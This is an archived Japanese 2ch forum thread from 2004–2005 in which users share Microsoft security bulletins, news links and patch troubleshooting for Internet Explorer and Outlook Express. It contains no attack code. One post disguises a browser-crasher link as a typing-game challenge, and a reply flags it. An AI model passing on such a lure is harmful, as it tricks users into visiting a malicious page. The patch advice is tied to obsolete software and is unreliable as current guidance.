            みつを
824名無しさん@お腹いっぱい。:04/12/08 10:55:00
>>822
無問題といいきれないが、少なくともテキスト表示にして
標準のブラウザをIE(コンポーネント使用ブラウザ含む)以外のブラウザ(FireFoxとかOperaとか)にしておけば、
かなりリスクは低減できると思う(さらにJavaScriptも無効に)。

そこまでしてOE使うなという意見もあるけど、いろんな事情で使わざるを得ない人もいるだろうから…
OE 使うのはやめとけ

SP2パッチあててFirefox (Javaスクリプト無効) 導入汁

ファイアーウオールはKerio personal ファイアーウオールでMAXセキュに設定

ルーターは2重で完璧!!(要:ポート設定)

アンチウイルスソフトはノートンかKasperskyA-V導入


これだけで9割不正アクセス&ウイルスに対して有効
826名無しさん@お腹いっぱい。:04/12/08 14:43:54
やっぱコンポーネントの問題は逃れられないのか。

んで、さっきIE6を
アンインストール→インストールし直し
したんだけど、
Windows Updateで、なぜか823559だけ何度も表示される。
適用したはずなのに、再起動してもう一度行くとまた表示される。
パッチをダウンロードして保存してから実行してもダメ。
まぁこんなこともよくあるのでしょう・・・が、
ちょっと不安なので、バージョン合ってるか見て下さい。

Ver.6.0.2800.1106
更新バージョン ; SP1 ; Q889293 ; Q837009 ; q313829
(最後のだけなぜかQが小文字)

関係ないけどこのバージョン情報って何とかコピペ出来ないんだろうか。
そもそもなぜ出来ないようにしてあるのだろうか。
827826:04/12/08 14:45:55
書き忘れ
OSは98seです。
>>825
ソフトよりユーザーの知識や意識の方が大事
829 ◆DrP5COAzdc :04/12/08 16:06:11
>>826
このスレは初めてですが、同じ環境なので取り敢えず参考程度になれば・・・
スタート>プログラム>アクセサリ>システムツール>システム情報
のInternet Explorerを見ると、以下のようになっています。(コピーも出来ます)

バージョン    6.0.2800.1106IS
ビルド    62800.1106
プロダクト ID    *****-***-*******-*****
アプリケーションのパス    C:\Program Files\Internet Explorer
最終インストールの日付    16/07/24 15:56:35
言語    日本語
アクティブなプリンタ    Kyocera Mita KM-2070 KX,KM163097,***.***.*.*:lp
    
暗号強度    128 ビット
コンテンツ アドバイザ    無効
更新バージョン    ;SP1;q313829;Q822925;Q828750;Q824145;Q832894;Q837009;Q831167;Q823353;Q867801;Q833989;Q834707;Q889293;
Java VM バージョン    5.0.3810.0
IEAK インストール    する

IEの更新バージョンに 823559 は見あたりませんが、「Windows Q823559 のアップデート」
というのが、「アプリケーションの追加と削除」にリストアップされています。
これは、システム情報の W98.SE の所でも見られます。

ちなみに、IE5→5.5→6とバージョンアップしてきて、IEをアンインストールしたことはありません。
830826:04/12/08 19:22:17
>>829
有り難う御座います!参考になりました。
そうか、システム情報か・・・

> バージョン 6.0.2800.1106IS
このISってのが謎です。
↓うちのはこんな感じです。

バージョン6.0.2800.1106
ビルド62800.1106
アプリケーションのパスC:\Program Files\Internet Explorer
最終インストールの日付04/12/08 13:32:51
言語日本語
暗号強度128 ビット
コンテンツ アドバイザ無効
更新バージョン;SP1;Q889293;Q837009;q313829;
Java VM バージョン5.0.3810.0
IEAK インストールしない
831名無しさん@お腹いっぱい。:04/12/09 10:41:14
IEやFirefoxなどにポップアップ・ウインドウを“乗っ取られる”セキュリティ・ホール
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20041208/153638/
>>831
そこの
>Secuniaでは「信頼できるサイトを閲覧しているときには,信頼できないサイトを閲覧しない
>(Do not browse untrusted sites while browsing trusted sites)」ことを対策として挙げている。

の意味がいまいち分からんけど、やっぱ漏れが頭が悪いからかな?
>>832
作成者が分かってるサイトと一緒に、誰が作ってるのか分からないような変なサイト見るなって事。
「IEでしか読めないページ,Windowsでしか使えないシステムは不適」,経産省が調達ガイドライン作成へ
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20041210/153722/
835KB887797:04/12/15 12:24:01
Outlook Express 6 Sevice Pack 1 の累積的な更新プログラム(KB887797)
なるものがWindowsUpdateに来ている。詳細不明。
836834:04/12/15 12:26:26
× Sevice Pack 1
○ Service Pack 1
逝ってきます…
837835=836:04/12/15 12:27:50
>>836
ああ、835だった。834氏スマソ本当に逝ってきます。
838名無しさん@お腹いっぱい。:04/12/15 15:31:44
KB887797は、Knowledge Baseもまだ用意されてないね。
しばらく様子見。

http://www.microsoft.com/downloads/results.aspx?productID=&freetext=KB887797&DisplayLang=en
Knowledge Base Article
http://go.microsoft.com/fwlink/?LinkId=38306 (これから用意するつもりらしい)
>>838
http://www.microsoft.com/downloads/details.aspx?FamilyID=785c35bb-0f03-4f2d-9e1c-66c9934b4610&DisplayLang=en
>Supported Operating Systems: Windows XP Service Pack 2


「まさかSP2でエンバグ゙しちゃったわけないよね?なにしろ名前にセキュリティ強化機能搭載ってつけたぐらいだし。」
嫌味ったらしく小1時間(ryしたい>MS
Outlook Express 6 Service Pack 1 用の累積的な更新プログラム (KB887797)
このセキュリティに関連しない更新プログラムによって、Outlook Express のさまざまな問題が解決されます。

デスクトップに ~ というファイルが作成されるのが無くなったかも。
KB887797ぐぐっても昨日は0件だったが、今日は684件になってる(・∀・)
でも、めぼしい情報はなさげ(;´Д`)
>>841
http://www.microsoft.com/downloads/results.aspx?freetext=887797&productID=&DisplayEnglishAlso=on&DisplayLang=ja
OE SP2は「Windows XP 用 Outlook Express」と言い張ることになったらしいw
てことはIE SP2も日本語情報では「Windows XP 用 Internet Explorer」になるのかな
ある意味正しいしわかりやすくて(・∀・)イイ!!けど

887797は↓の修正パッチがWindowsUpdateにも北ということでいい?>ALL
http://support.microsoft.com/default.aspx?scid=kb;ja;843555
oO(なんで今?)
843名無しさん@お腹いっぱい。:04/12/17 08:47:05
>>842
そだね。http://support.microsoft.com/default.aspx?scid=kb;ja;843555の修正だね
やっとhttp://support.microsoft.com/kb/887797が公開された

KB887797適用上の注意点は、
>ノート この最新版がウインドウズ・アッデート・ウェブサイト上であなたに利用可能になる前に、
>次のマイクロソフト知識基礎記事に記述される最新版をインストールしなければなりません。
>823353 MS04-018:アウトルック・エキスプレスのための累積的なセキュリティ最新版
http://support.microsoft.com/kb/823353
844名無しさん@お腹いっぱい。:04/12/17 11:31:26
>>842-843
Outlook Expressに「BCC」を表示する新たな不具合,MSはパッチを公開
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20041216/153984/
>米Microsoftは米国時間12月16日,同社のメール・ソフト「Outlook Express」に
>見つかった不具合を公表した。メールの送信者が「BCC(Blind Carbon Copy)」
>欄に記入したアドレスを,受信者すべてに見られる可能性がある。同様の不具合は
>2004年8月に見つかっているhttp://support.microsoft.com/kb/843555が
>今回公表されたのは別の不具合である(関連記事http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040825/149044/)。
>同社では,この不具合を修正するための更新プログラム(パッチ)を公開した。
>同パッチを適用すれば,2004年8月の不具合を含む,いくつかの不具合も修正できる。
>>844
別のなんだー





ところで日本語KBで機械翻訳のやつはいつも決まり文句も変だよね
翻訳エンジンにお約束用語は入ってないのかと(ry
結局わかんないところは英語情報見るっちゅーねん
846名無しさん@お腹いっぱい。:04/12/19 22:54:20
IEにクロスサイト・スクリプティング攻撃を許すぜい弱性,ページ偽装やCookie盗難の危険
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20041217/154040/
>844
分割送信時のみの危険ということだな。分割送信のチェックだけまずは
チェックオフを確認して、IEのSP待つとしよう。
>>847
残念
>今回の不具合は,メールを分割しなくてもBCCのアドレスを本文中に表示してしまうというもの。







しかしSP2になっても相変わらずグダグダだw
>>846http://pc5.2ch.net/test/read.cgi/sec/1060956936/754
849名無しさん@お腹いっぱい。:04/12/21 01:00:19
>848
ああ読み違えた。ありがと。当てました。
不具合をこっそりと直して知らん振りを決め込むのは、企業として何処でもやっている当たり前の行為だ。
大企業としてまず率先して情報公開に貢献してもらいたいものだ。
Microsoftはかなり貢献してると思うけど。マジで
IEにフィッシングの危険――ActiveXに問題
Microsoftは、複数のセキュリティ関連企業から指摘された、
Internet Explorer 6の脆弱性について、調査を進めていると明らかにした。
http://www.itmedia.co.jp/enterprise/articles/0412/20/news009.html

(´-`).。oO(信頼できるサイトを除いて、Internet Explorerで閲覧しないことだね…)
853名無しさん@お腹いっぱい。:04/12/24 16:52:40
[Full-Disclosure] Internet Explorer FTP client can be used to send mail
http://lists.netsys.com/pipermail/full-disclosure/2004-December/030229.html
854名無しさん@お腹いっぱい。:04/12/24 23:36:10
安全という嘘をつくにはさらに嘘をつかねばならない。

独占企業と訴えられないようにAppleを生かしておかねばならない。
855名無しさん@お腹いっぱい。:04/12/27 12:41:21
Microsoft Internet Explorer XP SP2 Fully Automated Remote Compromise
http://freehost07.websamba.com/greyhats/sp2rc-analysis.htm
856名無しさん@お腹いっぱい。:04/12/28 12:01:30
俺自身の脆弱性が問題だ
>>856
何でもクリックしてしまう悲しい性とか?
858名無しさん@お腹いっぱい。:04/12/28 12:32:19
正解。
┐(´ー`)┌
860名無しさん@お腹いっぱい。:05/01/05 17:08:28
IEのFTP機能にセキュリティ・ホール,任意のファイルをダウンロードさせられる
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050105/154424/
http://secunia.com/advisories/13704/
>>860
IE6SP1以前はもうだめかなぁ

XP-SP2に汁(なかったらXPまともに動くPC買え)ってことか・・・
862名無しさん@お腹いっぱい。:05/01/12 12:21:53
HTML ヘルプの脆弱性により、コードが実行される (890175) (MS05-001)
http://www.microsoft.com/japan/technet/security/bulletin/ms05-001.asp
カーソルおよびアイコンのフォーマットの処理の脆弱性により、リモートでコードが実行される (891711) (MS05-002)
http://www.microsoft.com/japan/technet/security/bulletin/ms05-002.asp
インデックス サービスの脆弱性により、コードが実行される (871250) (MS05-003)
http://www.microsoft.com/japan/technet/security/bulletin/ms05-003.asp

Windowsの修正パッチが3件公開,既知の危険なセキュリティ・ホールをふさぐ
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050112/154606/
1月のWindowsアップデート、HTMLヘルプの脆弱性などに対処
http://www.itmedia.co.jp/enterprise/articles/0501/12/news007.html
マイクロソフト、「緊急」レベルのWindowsパッチをリリースへ
http://japan.cnet.com/news/sec/story/0,2000050480,20079963,00.htm
------------------------------------------------------------------
IE 6の脆弱性、最高レベルの深刻度に--セキュリティ対策企業が評価引き上げ
http://japan.cnet.com/news/sec/story/0,2000050480,20079962,00.htm
863名無しさん@お腹いっぱい。:05/01/12 14:49:59
IEのパッチ未公開セキュリティ・ホールを再警告,デモ・ページも公開
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050111/154582/
まさかセキュリティ情報一覧をセキュリティ情報検索(自動ですべて)と合体しちゃうとは思わなかったー
一覧画面から情報の最終更新日わかんないyo
初めて出た日付なんてどうでもいいんじゃ いっつも後から大事な情報出してくるじゃん ヴォケ−
そんなに釣った魚にリソース割り当てたくないのかよ(´・ω・`)ショボーン
865名無しさん@お腹いっぱい。:05/01/18 08:54:02
>>861 XP SP2もだめぽ。
XP SP2のIEにセキュリティ・ホール,警告なしにファイルをダウンロードさせられる
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050117/154841/

>>864
なんか使いにくくなったね。
>>865
そのExploit-Codeが出回る頃には、セキュリティソフトベンダーが
ウィルスとして対応するので、常駐シールドしていればそのような事にはなりませんから
見た人は勘違いしない事。
>>865-866
ベンダーが対応するまでは、怪しいサイトによく行く人は用心汁。
複数の種類のブラウザを用途によって使い分けるのも吉。
868名無しさん@お腹いっぱい。:05/01/18 21:43:41
[WSJ] MSの無料スパイウェア対策ソフトを推奨できない理由
http://www.itmedia.co.jp/enterprise/articles/0501/17/news085.html
MSセキュリティ ホーム から
tp://www.microsoft.com/japan/technet/security/bulletin/ms05-003.asp

MSセキュリティ情報検索(元一覧ページ) から
tp://www.microsoft.com/japan/technet/security/Bulletin/MS05-003.asp

(05-003はただの例)
同じところなのに大文字と小文字違いで一度飛んだリンクも紫にさせない意味わけわかめ
意味なんてないのかも???
870名無しさん@お腹いっぱい。:05/01/21 04:00:45
メーラーはOutlook以外を使う
ブラウザはIE以外を使う

これだけでセキュリティレベルが上がる
Windowsのセキュリティ問題、最新パッチでは修正されず
http://japan.cnet.com/news/sec/story/0,2000050480,20080243,00.htm
http://pc.watch.impress.co.jp/docs/2005/0128/ms.htm
クライアント部門は営業利益率78%・・・ピークよりはsageてるね
873名無しさん@お腹いっぱい。:05/01/28 21:47:57
Outlook Express で ASCII 文字以外の文字を使用すると本文が切れてしまう
http://support.microsoft.com/default.aspx?scid=kb;ja;893197

概要:Outlook Express 6 Service Pack 2 において ASCII 文字以外の文字を使用してメールを作成し、
送信トレイに一度保存した後、 再度送信トレイを開くと、作成したメールが途中から切れて削除されて
しまう場合があります。
解決方法:この問題を解決するには、Windows Update Web サイトから
[KB:887797 Windows 用 Outlook Express の更新プログラム] の更新プログラムを入手します。
http://windowsupdate.microsoft.com/
2月のマイクロソフト月例セキュリティ修正は13件も,「緊急」が非常に多い
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20050204/2/
>>874
いよいよ明日ですね
876名無しさん@お腹いっぱい。:05/02/09 10:39:26
Internet Explorer 用の累積的なセキュリティ更新プログラム (867282) (MS05-014)
公開日: 2005年2月9日 | 最終更新日: 2005年2月9日
http://www.microsoft.com/japan/technet/security/bulletin/ms05-014.mspx
>>876
>重要: 以前に適用した修正プログラムまたは、更新プログラムのロールアップを使用している環境には、本セキュリティ更新プログラムを適用してはいけません。
>「よく寄せられる質問」をご覧いただき、適切な更新プログラムのロールアップを適用してください。
「いけません」ってめちゃx2誤解させる書き方だよな

これって結局
「電話で修正プログラム手に入れてもない&IEロールアップあてたことない香具師にはどーでもいー話だけど
関係ある環境は11月以降のIEロールアップあたってるならこのパッチだけで面倒見てやるけど
あたってない環境だとインストーラ的にアウトなんで11月(か12月)IEロールアップあててからこのパッチもあてれ」
だよね?

だったらパッチ・インストーラ作り直そうyoって思ったの漏れだけ?





ふー 大漁パッチあてやっとオワタ
フレーフレー(としかいいようがないけど)>いろんな動作(ryしなきゃ/もう始めてるよの中の人
Windowsなどに危険なセキュリティ・ホールが多数,早急にパッチの適用を
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050209/155909/
http://www.itmedia.co.jp/enterprise/articles/0502/09/news080.html
>OSのメンテナンスにリソースを割くことではないはずです。
・・・この言葉だけは正し杉・・・言う相手はともかく
>>877
IE のアップデート MS05-014 (KB867282) を適用する際の注意
http://www.updatecorp.co.jp/products/support/updateexpert/uekb/uekb00000296.html
881名無しさん@お腹いっぱい。:05/02/16 12:18:17
米Microsoftがセキュリティ強化ロードマップ,IE 7.0のベータをXP SP2向けに今夏リリース
http://itpro.nikkeibp.co.jp/free/ITPro/USNEWS/20050216/156231/

いじわるしないで他のOS向けにも出すべきだよ。
IE 7だけではない、MSのセキュリティ強化策
http://www.itmedia.co.jp/news/articles/0502/16/news044.html
>従来ほど大きなファイルをダウンロードしなくて済む、新しいパッチの配信を急いでいる
大きいって感じないんだけどなー
集中が問題とかか?
883882:05/02/16 19:07:28
881のリンクじゃないや
884名無しさん@お腹いっぱい。:05/02/17 16:11:30
[Full-Disclosure] IE/OE Restricted Zone Status Bar Spoofing
http://lists.netsys.com/pipermail/full-disclosure/2005-February/031773.html
885名無しさん@お腹いっぱい。:05/02/22 15:20:39
XP SP2のIE 6にタイトルバーを偽装される脆弱性、フィッシング詐欺も懸念
http://internet.watch.impress.co.jp/cda/news/2005/02/22/6538.html
886名無しさん@お腹いっぱい。:05/02/23 08:52:39
Windows Update キタ─wwヘ√レvv~(゚∀゚)─wwヘ√レvv~─!!!!!!

Double-byte character set (DBCS) characters may appear corrupted in
Internet Explorer on Windows XP when you browse a Web site that uses
Shift-JIS character encoding(KB886677)
http://support.microsoft.com/kb/886677
You receive the Stop error "Stop 0x05 (INVALID_PROCESS_ATTACH_ATTEMPT)"
in Windows XP Service Pack 2 or Windows Server 2003(KB887742)
http://support.microsoft.com/kb/887742
887名無しさん@お腹いっぱい。:05/02/23 16:54:18
>>886
マイクロソフト,XP SP2用の重要なパッチをWindows Updateで公開
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050223/156582/
>パッチ自体は2004年中に同社のWebサイトで公開されていたが,今回Windows Updateでも公開された。
>重要なパッチなので,XP SP2用ユーザーは適用しておきたい。
MS、XP SP2向け2種類の更新プログラムをWindows Update経由で公開
http://www.itmedia.co.jp/enterprise/articles/0502/23/news085.html
たまたまとられた
890名無しさん@お腹いっぱい。:05/02/24 15:25:32
Blogがやばい――スパイウェアの配布に悪用される脆弱性あり
http://www.itmedia.co.jp/news/articles/0502/24/news045.html
>セキュリティ専門家らによると、この問題が影響するのは、
>MicrosoftのInternet Explorer(IE)ユーザーがセキュリティ設定を最高にしていない場合だけだという。
>>886-888の日本語?
Windows XP 上の Internet Explorer で Shift-JIS 文字エンコードを使用する Web サイトを参照すると、2 バイト文字セット (DBCS) 文字が正しく表示されない場合がある
http://support.microsoft.com/kb/886677/ja
Windows XP Service Pack 2 または Windows Server 2003 で Stop エラー "Stop 0x05 (INVALID_PROCESS_ATTACH_ATTEMPT)" が表示される
http://support.microsoft.com/kb/887742/ja
>>890
scriptだけでどうやって感染するのか書いてないな。
内容がはしょられすぎ
IEにこんな裏技あるのね。ちょっとスレ違いだけど・・・
>常駐させなくても(・∀・)イイ!! SpywareBlaster 5
>>>718
>そんなにスパイウェアが心配ならこの辺も熟読しておこう。
>
>【総合】スパイウェア予防駆除 Part6
>http://pc5.2ch.net/test/read.cgi/sec/1108613740/19-53
>
>IEのステータスバーをWクリック→インターネットゾーンを「高」
>
>見慣れないサイトを見る時にこうする癖をつければ、まず感染することはない。
>>892
そんな手口いきなり詳しく書いちゃかえってまずいじゃん
>>894
どうよんでも、どこがウイルスなのかわからん。
増殖は不可能だろ?
896名無しさん@お腹いっぱい。:05/02/28 11:00:38
IE 7.0はタブ付きブラウジング機能を搭載
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20050228/3/
タイピングの速さに自信がある諸君
ここの250点という怪記録を越えることができるかな
ttp://freegame.sytes.net/~take/cgi-bin/typecreate/index.html
>>897
ブラクラサイト
899名無しさん@お腹いっぱい。:05/03/07 10:41:06
IE 7.0はWindows 2003 SP1とXP x64向けにも開発,Outlook Expressの新版はなし
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20050307/2/

Windows 2000 SP4向けにも頼むYO orz
なければないでちょっと不安になってくるのは気のせいかw

> 2005 年 3 月 8 日 (米国日付)、マイクロソフト セキュリティ レスポンス センターは、新しいセキュリティ情報をリリースする予定はありません。
http://www.microsoft.com/japan/technet/security/bulletin/advance.mspx
フリー・ソフトでIEを強化しよう
http://itpro.nikkeibp.co.jp/free/NT/WinColumn/20050314/1/
902名無しさん@お腹いっぱい。:2005/03/24(木) 15:57:14
セキュリティで保護された Web サイトに接続すると Internet Explorer 6 SP1 が応答を停止することがある
http://support.microsoft.com/default.aspx?scid=kb;ja;842607
903名無しさん@お腹いっぱい。:2005/03/24(木) 15:59:23
リンクをクリックすると文字のサイズが中に戻る
http://support.microsoft.com/default.aspx?scid=kb;ja;896315
904名無しさん@お腹いっぱい。:2005/03/24(木) 22:01:53
>>902-903
タイトルに[IE]〜付けるのやめたのか
あれ(これは見なくていいや)一目でわかりやすかったのにね
905名無しさん@お腹いっぱい。:皇紀2665/04/01(金) 14:18:55
マイクロソフト:「Windows用パッチに脆弱性あり」
http://japan.cnet.com/news/sec/story/0,2000050480,20082248,00.htm
>Microsoftは、1月にリリースしたWindows 98/ME用のセキュリティパッチに欠陥があり、
>これらのオペレーティングシステム(OS)が動作するシステムが攻撃を受けるおそれがあることを認めた。
906名無しさん@お腹いっぱい。:皇紀2665/04/01(金) 14:25:41
>>905
記事中には「1月に出た」MS05-002とあるが、Windows 98/ME用MS05-002パッチは3/9にリリースされている。
参考:KB891711不具合報告
緊急! WindowsUpdateをしましょう!
http://pc8.2ch.net/test/read.cgi/sec/1060956936/919-
907名無しさん@お腹いっぱい。:2005/04/05(火) 09:28:42
米eEyeがIEやOutlookのセキュリティ・ホールを発見,詳細については未公表
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050404/158433/
908名無しさん@お腹いっぱい。:2005/04/05(火) 13:27:56
>>907
なんだかすっきりしないな。
さんざんチン●をしごかれた後に放り出されたような…
909名無しさん@お腹いっぱい。:2005/04/08(金) 18:15:14
4月の月例パッチは“緊急”を含む8件、ウイルス駆除ツールも更新
http://internet.watch.impress.co.jp/cda/news/2005/04/08/7193.html
>米国時間の12日

いつものことだけど日本だと水曜日ですね ウキウキ(はしないか)
910名無しさん@お腹いっぱい。:2005/04/13(水) 13:28:42
【緊急】
MS05-019 - TCP/IP の脆弱性により、リモートでコードが実行され、サービス拒否が起こる (893066)
http://www.microsoft.com/japan/technet/security/bulletin/ms05-019.mspx
【緊急】
MS05-020 - Internet Explorer 用の累積的なセキュリティ更新プログラム (890923)
http://www.microsoft.com/japan/technet/security/bulletin/ms05-020.mspx
【緊急】
MS05-021 - Exchange Server の脆弱性により、リモートでコードが実行される (894549)
http://www.microsoft.com/japan/technet/security/bulletin/ms05-021.mspx
【緊急】
 MS05-022 - MSN Messenger の脆弱性により、リモートでコードが実行される (896597)
http://www.microsoft.com/japan/technet/security/bulletin/ms05-022.mspx
【緊急】
 MS05-23 - Microsoft Word の脆弱性により、リモートでコードが実行される(890169)
http://www.microsoft.com/japan/technet/security/bulletin/ms05-023.mspx
【重要】
MS05-016 - Windows シェルの脆弱性により、リモートでコードが実行される (893086)
http://www.microsoft.com/japan/technet/security/bulletin/ms05-016.mspx
【重要】
MS05-017 - メッセージ キューの脆弱性により、コードが実行される(892944)
http://www.microsoft.com/japan/technet/security/bulletin/ms05-017.mspx
【重要】
MS05-018 - Windows Kernel の脆弱性により、特権の昇格およびサービス拒否がおこる (890859)
http://www.microsoft.com/japan/technet/security/bulletin/ms05-018.mspx
911名無しさん@お腹いっぱい。:2005/04/13(水) 13:31:31
【緊急】
カーソルおよびアイコンのフォーマットの処理の脆弱性により、リモートでコードが実行される (891711) (MS05-002)
セキュリティ情報 MS05-002 を更新しました。
Windows 98、Windows 98 Second Edition および Windows Millennium Edition 用
の新しいセキュリティ更新プログラムが利用可能になりました。
既に公開済みの他の OS 用の更新プログラムに変更はありません。
http://www.microsoft.com/japan/technet/security/bulletin/MS05-002.mspx

↑不具合情報のあった98,98SE,ME用の891711修正パッチのの修正版キタ━━━━━━(゚∀゚)━━━━━━ !!!!!

【緊急】
PNG 処理の脆弱性により、バッファオーバーランが起こる (890261) (MS05-009)
 Microsoft Windows Messenger version 4.7.0.2009 (Windows XP Service Pack 1 で実行されている場合) 用
 の更新パッケージが利用可能になりました。
http://www.microsoft.com/japan/technet/security/bulletin/MS05-009.mspx
912名無しさん@お腹いっぱい。:2005/04/15(金) 10:51:07
WindowsやIE,Oracleのセキュリティ・ホールを突くコードがさっそく出回る
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050414/159277/
913名無しさん@お腹いっぱい。:2005/04/15(金) 13:21:39
深刻度格付けは確か「情報初公開時の」だったはずだから
その時点では攻撃コードがないってことで「重要」になってても
パッチを逆アセンブルされるのかすぐ実質「緊急」クラスに昇格することが多いな

知られてないセキュリティホールのパッチは確かに考えもんだわ
そんな言い訳でもう攻撃コードあるのまで放置されそうだけどw
914名無しさん@お腹いっぱい。:2005/04/21(木) 22:37:51
Microsoft UpdateとWSUSは6月にリリースの予定
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20050421/1/
915名無しさん@お腹いっぱい。:2005/04/22(金) 11:22:34
>>914
そりゃそうだろうよ
おりゃ、無印のXPが発売された時に、
こりゃSP1になるまでは使い物にならないと判断して、
SP1が発売されるまで買わなかったもんね。
916名無しさん@お腹いっぱい。:2005/05/09(月) 22:41:29
米eEyeがIEなどのセキュリティ・ホールを再び発見,深刻度は「高」
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050509/160520/
917名無しさん@お腹いっぱい。:2005/05/11(水) 08:35:44
「Web の表示」の脆弱性により、リモートでコードが実行される (894320) (MS05-024)
http://www.microsoft.com/japan/technet/security/bulletin/ms05-024.mspx
最大深刻度 : 重要
918名無しさん@お腹いっぱい。:2005/05/11(水) 08:43:46
>>917
○影響を受けるソフトウェア :
Microsoft Windows 2000 Service Pack 3 および Microsoft Windows 2000 Service Pack 4
※Microsoft Windows 98、Microsoft Windows 98 Second Edition (SE)、Microsoft Windows Millennium Edition (ME)
 ※「緊急」以外のセキュリティ問題のための更新プログラムは提供されません。
○影響を受けないソフトウェア :
Microsoft Windows XP Service Pack 1 および Microsoft Windows XP Service Pack 2
Microsoft Windows XP 64-Bit Edition Service Pack 1 (Itanium)
Microsoft Windows XP 64-Bit Edition Version 2003 (Itanium)
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2003 および Windows Server 2003 Service Pack 1
Microsoft Windows Server 2003 for Itanium-based Systems および Service Pack 1 を適用した Microsoft Windows Server 2003 for Itanium-based Systems
Microsoft Windows Server 2003 x64 Edition
上記のソフトウェアのテストを行い、この脆弱性による影響を評価しました。それより前のバージョンに関してはサポートの対象となっていないため、この脆弱性による影響は不明です。
http://www.microsoft.com/japan/technet/security/bulletin/ms05-024.mspx
919名無しさん@お腹いっぱい。:2005/05/11(水) 08:50:35
Windows 2000用修正パッチが公開,既知の「重要」セキュリティ・ホールをふさぐ
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050511/160620/
920名無しさん@お腹いっぱい。:2005/05/11(水) 15:51:13
>>919
>「従来のWindowsフォルダを使う」に設定変更して回避する
Win98,98SE,MEはパッチもないし今後は↑しかないわけだ



なんか穴が見つかって回避策するたびにちょっとずつ不便になって
最終的に知里も積もれば状態になってるような気がするのは漏れだけ?
921名無しさん@お腹いっぱい。:2005/05/11(水) 17:55:38
従来のWindowsフォルダなんか不便で使えんぞ。
どうにかしてくれよな。
922名無しさん@お腹いっぱい。:2005/05/13(金) 19:32:56
セキュリティアドバイザリいくら試験公開版だからってMSサイト内からたどりつけなかったw
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050511/160680/

http://www.microsoft.com/japan/technet/security/advisory/892313.mspx
>これはセキュリティ上の脆弱性ではありません。しかし、この更新プログラムは、悪質な Web サイトにアクセスさせられてしまうかもしれないユーザーに対して、追加の警告を促すために発行されました。

びっみょー
923いちおう:2005/05/14(土) 16:00:13
Intelのハイパースレッディングに深刻な脆弱性
http://www.itmedia.co.jp/enterprise/articles/0505/14/news009.html
924名無しさん@お腹いっぱい。:2005/05/15(日) 00:53:15
IEとOutlookに未パッチの脆弱性、eEyeが概略公開
http://www.itmedia.co.jp/enterprise/articles/0505/14/news010.html
925名無しさん@お腹いっぱい。:2005/06/02(木) 11:25:16
IEに強制終了させられるセキュリティ・ホール,危険性は小さい
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050601/161972/

Windows 2000向けパッチ集「Update Rollup 1」が6月1日に登場
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20050530/2/
まだかな?
926名無しさん@お腹いっぱい。:2005/06/02(木) 12:40:19
> Windows 2000向けパッチ集「Update Rollup 1」が6月1日に登場
> http://itpro.nikkeibp.co.jp/free/NT/NEWS/20050530/2/
> まだかな?

それ英語版でしょ
927名無しさん@お腹いっぱい。:2005/06/02(木) 12:53:04
>>926
日本語版も時間差ほとんどないと思うよ。

>2005 年半ばに Windows 2000 Service Pack 4 (SP4) 対応の更新プログラムのロールアップの提供を予定しています。
http://www.microsoft.com/japan/windows2000/server/evaluation/news/bulletins/rollup.asp
928名無しさん@お腹いっぱい。:2005/06/02(木) 13:22:29
>>925-927
近々2kを再インスコする予定なので有難い。
929名無しさん@お腹いっぱい。:2005/06/06(月) 10:05:28
Windows 2000向けIE 7.0は結局なし
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20050606/1/

まあ、そうだろうとは予想してましたよ…
930名無しさん@お腹いっぱい。:2005/06/06(月) 15:04:10
[IE] 画像ファイルのドラッグ&ドロップのキャンセルによりメモリリーク
http://support.microsoft.com/default.aspx?scid=kb;ja;900856
931名無しさん@お腹いっぱい。:2005/06/08(水) 17:32:13
セキュ板のWUスレがおちてるのでここにカキコ

マイクロソフト、「Windows Update v6」への段階的移行を公表
http://internet.watch.impress.co.jp/cda/news/2005/06/07/7921.html


ところでちょっと早いけどここの次スレどうする?
「IE5・5と6・0、ネット閲覧ソフトに欠陥」の次スレも全部まとめて
(つーか住人かなりかぶってるだろw)
「MSソフトのセキュリティ対策スレ」
でよくない?
932名無しさん@お腹いっぱい。:2005/06/08(水) 20:24:29
ちょっと広いやうな奇ガス
できれば純正メーラーで欲しいけんど…
人居ないしどうしたもんか
933名無しさん@お腹いっぱい。:2005/06/10(金) 16:48:27
今月の定期便は緊急もあるそうですよ
http://www.itmedia.co.jp/enterprise/articles/0506/10/news032.html
934名無しさん@お腹いっぱい。:2005/06/10(金) 22:50:10
「6月に公開するセキュリティ情報は10件,『緊急』を含む」――マイクロソフトが予告
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050610/162551/

>>931
同意
935名無しさん@お腹いっぱい。:2005/06/11(土) 16:21:36
「修正プログラムの検証には数週間必要」――米MSのセキュリティ担当ディレクタ
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050526/161567/

まぁ検証の方がよっぽど手間かかるのは確かだろうけどさ・・・
Windowsで稼いだ利益わけわかんないところに激回すぐらいなら
社内テスト環境もっと増やして並列度あげてくれよ・・・
936名無しさん@お腹いっぱい。:2005/06/13(月) 12:03:01
IE7の動作モードに関して開発者がブログに書き込み
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20050613/3/
937名無しさん@お腹いっぱい。:2005/06/14(火) 15:03:33
>>934
いよいよ明日(日本時間)だね
